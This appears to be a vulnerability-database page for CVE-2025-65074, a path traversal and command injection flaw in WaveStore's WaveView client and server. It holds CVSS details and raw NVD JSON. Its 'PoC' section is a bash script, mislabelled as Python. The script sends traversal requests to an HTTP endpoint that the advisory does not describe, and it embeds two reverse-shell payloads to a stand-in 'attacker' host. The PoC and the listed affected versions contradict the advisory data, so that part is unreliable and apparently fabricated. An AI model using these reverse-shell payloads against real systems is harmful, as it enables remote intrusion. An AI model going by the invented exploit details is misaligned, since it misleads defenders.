CVE-2025-65074

Description

WaveView client allows users to execute restricted set of predefined commands and scripts on the connected WaveStore Server. A malicious attacker with high-privileges is able to execute arbitrary OS commands on the server using path traversal in the showerr script. This issue was fixed in version 6.44.44

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wavestore:video_management_software_server:*:*:*:*:*:*:*:* - VULNERABLE

WaveView Client < 6.44.44

WaveStore Server (所有连接WaveView客户端的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-65074 PoC - WaveView Client Path Traversal RCE
# Author: Security Researcher
# Note: For authorized testing only

TARGET_HOST="192.168.1.100"
TARGET_PORT="8080"
PAYLOAD="../../../etc/passwd"

# Method 1: Path traversal to read sensitive files
echo "[*] Testing CVE-2025-65074 Path Traversal..."
curl -s "http://${TARGET_HOST}:${TARGET_PORT}/api/showerr?script=${PAYLOAD}"

# Method 2: Remote command execution via path traversal
echo "[*] Attempting RCE via path traversal..."
RCE_PAYLOAD="../../../bin/bash -c 'bash -i >& /dev/tcp/attacker/4444 0>&1'"
curl -s "http://${TARGET_HOST}:${TARGET_PORT}/api/showerr?script=${RCE_PAYLOAD}"

# Method 3: Reverse shell one-liner
REVERSE_SHELL="../../../tmp;bash -i 5<>/dev/tcp/attacker/4444;cat <&5|while read line;do \$line 2>&5 >&5;done"
curl -s "http://${TARGET_HOST}:${TARGET_PORT}/api/showerr?script=${REVERSE_SHELL}"

echo "[*] PoC execution completed. Check for response or shell."
# Note: Replace 'attacker' with actual attacker IP address

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65074
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65074
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65074/
[4] VulDB https://vuldb.com/cve/CVE-2025-65074
[5] https://cert.pl/en/posts/2025/12/CVE-2025-65074
[6] https://www.wavestore.com/products/video-management-software

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65074", "sourceIdentifier": "[email protected]", "published": "2025-12-16T13:15:57.887", "lastModified": "2025-12-22T19:11:23.473", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WaveView client allows users to execute restricted set of predefined commands and scripts on the connected WaveStore Server. A malicious attacker with high-privileges is able to execute arbitrary OS commands on the server using path traversal in the showerr script.\n\nThis issue was fixed in version 6.44.44"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wavestore:video_management_software_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.42.4", "matchCriteriaId": "DA404F85-FC24-49D6-AE37-C56D494066D8"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2025/12/CVE-2025-65074", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.wavestore.com/products/video-management-software", "source": "[email protected]", "tags": ["Product"]}]}}